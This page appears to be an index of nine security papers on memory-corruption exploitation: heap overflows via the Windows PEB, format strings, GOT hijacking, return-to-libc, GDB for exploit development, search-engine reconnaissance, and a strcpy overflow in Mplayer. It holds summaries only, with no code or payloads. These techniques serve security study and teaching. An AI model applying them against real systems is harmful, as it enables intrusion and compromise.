[Engineering] Paper #9: [ Winheap PEB]: A paper that focuses on developing cross-platform exploits for Windows when abusing or exploiting Heap Overflows. By using the Process Environment Block (PEB) we are guaranteed a stable pointer to overwrite, providing the execution of malicious code.
[Engineering] Paper #8: [ Binary Reconstruction]: A very short paper that shows how useful knowing assembler is. By viewing the assembler of a binary it can be trivial to reconstruct the source of the application, in situations when you are not given the code of an application, such as a commercial binary or application.
[Exploitation] Paper #7: [ Advanced Format Strings]: A paper that discusses advanced format string exploitation in situations where user supplied input is not reachable. By combining techniques, it is still possible to exploit format bugs by using important application registers.
[Exploitation] Paper #6: [ GOT Hijack]: This brief text shows how someone can use pointers to exploit buffer overflows. By overwriting a Global Offset Table entry , it is possible to have the execution flow of an application diverted in a manner that will allow for a system to become compromised.
[Exploitation] Paper #5: [ Format Strings]: An unfinished text I started to write a while ago to understand format string exploitation of heap allocated user input strings. Runs over some basic examples on exploitation of printf misuse and how to hijack control of the process. Maybe one day I will finish it off but I just can't be bothered :-)
[Exploitation] Paper #4: [ Return-to-libc]: Returning to libc is a method of exploiting a buffer overflow on a system that has a non-executable stack, it is very similar to a standard buffer overflow, in that the return address is changed to point at a new location that we can control. However since no executable code is allowed on the stack we can't just tag in shellcode.
[Exploitation] Paper #3: [ GDB Debugging ]: This text provides some standard information on how to use GDB to debug an application during exploitation. By using a debugger it is possible to see exactly what is happening to an application during run-time, examining register and function values using common commands that help discover how to develop exploits.
[Data Mining] Paper #2: [ Eight Legs ]: This text introduces the reader to the potential use of Google when attacking a network. Internet search engine Spiders have been partly responsible for a multitude of very successful penetrations to otherwise, reasonably secure sites and networks. By using search engines it is possible to gather data from web servers that could be seen as sensitive.
[Exploitation] Paper #1: [ Buffer overflows ]: This text provides information on abusing destroyed NULL terminators on the x86 Linux architecture. In this example there is bad use of the strcpy() function, which is then manipulated by exploit code to maliciously execute injected instructions. The steps and bug are based on a real life example c0ntex found in Mplayer, though the source is different.